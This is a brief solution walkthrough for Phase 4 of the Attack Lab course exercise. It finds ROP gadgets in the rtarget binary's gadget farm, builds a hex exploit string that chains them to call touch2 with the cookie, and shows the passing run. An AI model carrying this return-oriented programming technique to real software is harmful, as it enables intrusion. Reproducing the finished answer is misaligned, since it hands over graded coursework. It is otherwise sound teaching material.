Attack Lab: Phase 4
About 1 minAbout 339 words
Run
objdump --disassemble rtarget > rtarget.asm
Read File rtarget.asm
...
0000000000401b6a <touch2>:
...
0000000000401d0f <start_farm>:
401d0f: b8 01 00 00 00 mov $0x1,%eax
401d14: c3 retq
0000000000401d15 <addval_420>:
401d15: 8d 87 48 89 c7 94 lea -0x6b3876b8(%rdi),%eax
401d1b: c3 retq
0000000000401d1c <setval_146>:
401d1c: c7 07 58 92 90 90 movl $0x90909258,(%rdi)
401d22: c3 retq
0000000000401d23 <addval_451>:
401d23: 8d 87 00 58 c3 1c lea 0x1cc35800(%rdi),%eax
401d29: c3 retq
0000000000401d2a <addval_158>:
401d2a: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401d30: c3 retq
0000000000401d31 <setval_387>:
401d31: c7 07 58 c3 08 57 movl $0x5708c358,(%rdi)
401d37: c3 retq
0000000000401d38 <getval_439>:
401d38: b8 48 89 c7 c3 mov $0xc3c78948,%eax
401d3d: c3 retq
0000000000401d3e <getval_205>:
401d3e: b8 b7 d7 58 c2 mov $0xc258d7b7,%eax
401d43: c3 retq
0000000000401d44 <setval_398>:
401d44: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
401d4a: c3 retq
0000000000401d4b <mid_farm>:
...
Design Gadget
58 popq %rax
c3 ret
48 89 c7 movq %rax, %rdi
c3 ret
Search Gadget in rtarget.asm
0000000000401d23 <addval_451>:
401d23: 8d 87 00 58 c3 1c lea 0x1cc35800(%rdi),%eax
401d29: c3 retq
0000000000401d2a <addval_158>:
401d2a: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401d30: c3 retq
Read File cookie.txt
0x3a9a6c2f
Write File phase-4.txt
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
26 1d 40 00 00 00 00 00
2f 6c 9a 3a 00 00 00 00
2c 1d 40 00 00 00 00 00
6a 1b 40 00 00 00 00 00
Run
./hex2raw < phase-4.txt > phase-4.in
./rtarget -i phase-4.in
Terminal Output
Cookie: 0x3a9a6c2f
Touch2!: You called touch2(0x3a9a6c2f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!